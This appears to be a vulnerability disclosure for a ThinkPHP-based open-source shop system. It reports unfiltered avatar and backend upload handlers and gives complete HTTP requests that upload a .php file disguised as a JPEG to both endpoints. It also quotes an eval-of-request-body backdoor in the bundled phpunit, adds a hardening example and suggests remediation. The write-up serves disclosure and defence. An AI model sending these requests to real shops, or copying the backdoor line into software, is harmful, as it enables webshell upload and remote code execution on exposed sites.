The shop is built on ThinkPHP 5.0 with MySQL and is a fully open-source storefront system that companies and individuals can use to set up their own free online shop; it also supports an open-source WeChat shop and an open-source mini-program.
I stumbled across this package by chance. It is fairly niche and its user base is small: going by a fofa search, there are roughly 500+ independent IPs running it.
Arbitrary file upload in the frontend and the backend
    // Avatar update in the member module, as shipped. Nothing about the image
    // is validated before it is written under upload/user/.
    public function updateUserImg($uid, $type){
        Log::write('开始更新会员头像');
        $condition = array('uid' => $uid);
        $user_info = $this->user->getInfo($condition, $field = 'uid,qq_info,wx_info');
        $qq_info = $user_info['qq_info'];
        $wx_info = $user_info['wx_info'];
        if($type=='qq'){
            $qq_info_array = json_decode($qq_info, true);
            $user_head_img = $qq_info_array['figureurl_qq_2'];
        }elseif($type=='wchat'){
            //Log::write('微信信息: ' . $wx_info);
            $wx_info_array = json_decode($wx_info, true);
            $user_head_img = $wx_info_array['headimgurl'];
        }else{
            $user_head_img = '';
        }
        $local_path = '';
        if(!empty($user_head_img)) {
            // The upload directory is created world-writable (0777).
            if(!file_exists('upload/user')){
                $mode = intval('0777',8);
                mkdir('upload/user',$mode,true);
                if(!file_exists('upload/user')) {
                    die('upload/user不可写,请检验读写权限!');
                }
            }
            // File name is time() plus a three-digit random number; the remote
            // image is fetched and written as-is.
            $local_path = 'upload/user/'.time().rand(111,999).'.png';
            save_weixin_img($local_path, $user_head_img);
        }
        if(!empty($local_path)) {
            $retval = $this->user->save(['user_headimg' => $local_path,], ['uid' => $uid]);
        }else{
            $retval = 0;
        }
        return $retval;
    }
No filtering of any kind is performed, which results in an arbitrary file write.
Exploitation:
    POST /index.php?s=/member/person HTTP/1.1
    Host: xxxx
    Content-Length: 924
    Cache-Control: max-age=0
    Origin: http://xxxx
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySuT4zF1iypR1XEll
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Referer: http://xxxx/index.php?s=/member/person
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=tnvvs3e635nf8vc8bg7k7dcmh6; page_cookie=%7B%22page_index%22%3A1%2C%22show_number%22%3A%2214%22%2C%22url%22%3A%22http%3A%2F%2F120.79.244.0%2Findex.php%3Fs%3D%2Fadmin%2Fconfig%2Fshopnavigationlist%22%7D
    Connection: close

    ------WebKitFormBoundarySuT4zF1iypR1XEll
    Content-Disposition: form-data; name="user_headimg"; filename="5e5cbbe4725bb.php"
    Content-Type: image/jpeg

    ------WebKitFormBoundarySuT4zF1iypR1XEll
    Content-Disposition: form-data; name="act"

    act_edit_img
    ------WebKitFormBoundarySuT4zF1iypR1XEll
    Content-Disposition: form-data; name="submit2"

    确认修改
    ------WebKitFormBoundarySuT4zF1iypR1XEll--
The backend performs no filtering either:
    POST /index.php?s=/wap/upload/uploadfile HTTP/1.1
    Host: xxxx
    Content-Length: 73793
    Cache-Control: max-age=0
    Origin: http://xxxx
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryilA30KLVw3Nyddto
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Referer: http://xxxx/index.php?s=/admin/auth/userdetail
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=tnvvs3e635nf8vc8bg7k7dcmh6; page_cookie=%7B%22page_index%22%3A1%2C%22show_number%22%3A%2214%22%2C%22url%22%3A%22http%3A%2F%2F120.79.244.0%2Findex.php%3Fs%3D%2Fadmin%2Fconfig%2Fshopnavigationlist%22%7D
    Connection: close

    ------WebKitFormBoundaryilA30KLVw3Nyddto
    Content-Disposition: form-data; name="file_path"

    upload/avator/
    ------WebKitFormBoundaryilA30KLVw3Nyddto
    Content-Disposition: form-data; name="file_upload"; filename="5e5cbbe4725bb.php"
    Content-Type: image/jpeg

    xxxx
    ------WebKitFormBoundaryilA30KLVw3Nyddto--
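As an added hardening example (not the shop's own code), this is how the avatar write behind /member/person and the backend /wap/upload/uploadfile handler could validate an upload before saving it. The function name saveUserHeadImg and the 2 MiB size cap are assumptions; the field name user_headimg and the upload/user directory are taken from the write-up, and the client-supplied file_path seen in the backend request is deliberately not accepted.

```php
<?php
// Added hardening example, not the shop's own code. Assumes the multipart
// field is still user_headimg and the target directory is upload/user/.
declare(strict_types=1);

function saveUserHeadImg(array $file, string $targetDir = 'upload/user'): string
{
    // Accept only a genuine HTTP upload that completed without error; this
    // rejects forged $_FILES entries and partial uploads.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    if ($file['size'] > 2 * 1024 * 1024) {   // assumed cap for an avatar
        throw new RuntimeException('avatar larger than 2 MiB');
    }

    // Derive the extension from the sniffed content, never from the client
    // filename or Content-Type header: filename="x.php" with a fake
    // image/jpeg header buys nothing here because the stored name is ours.
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime]) || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an allowed image');
    }

    // Fixed, server-chosen directory (no file_path from the request) and
    // no world-writable 0777 mode. Serving uploads with PHP execution
    // disabled is still a separate, recommended layer.
    if (!is_dir($targetDir) && !mkdir($targetDir, 0755, true)) {
        throw new RuntimeException('cannot create upload dir');
    }

    // Unguessable random name instead of time().rand(111,999).
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($targetDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    chmod($dest, 0644);
    return $dest;
}

// Usage in the member controller (hypothetical call site):
// $path = saveUserHeadImg($_FILES['user_headimg']);
// $this->user->save(['user_headimg' => $path], ['uid' => $uid]);
```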
Arbitrary command execution backdoor
    // Shipped inside the bundled phpunit: executes whatever PHP the request body contains.
    eval('?>' . file_get_contents('php://input'));
Remediation: remove the bundled phpunit outright, or change it to stdin.
This article was written by lufei; please credit the author when reposting.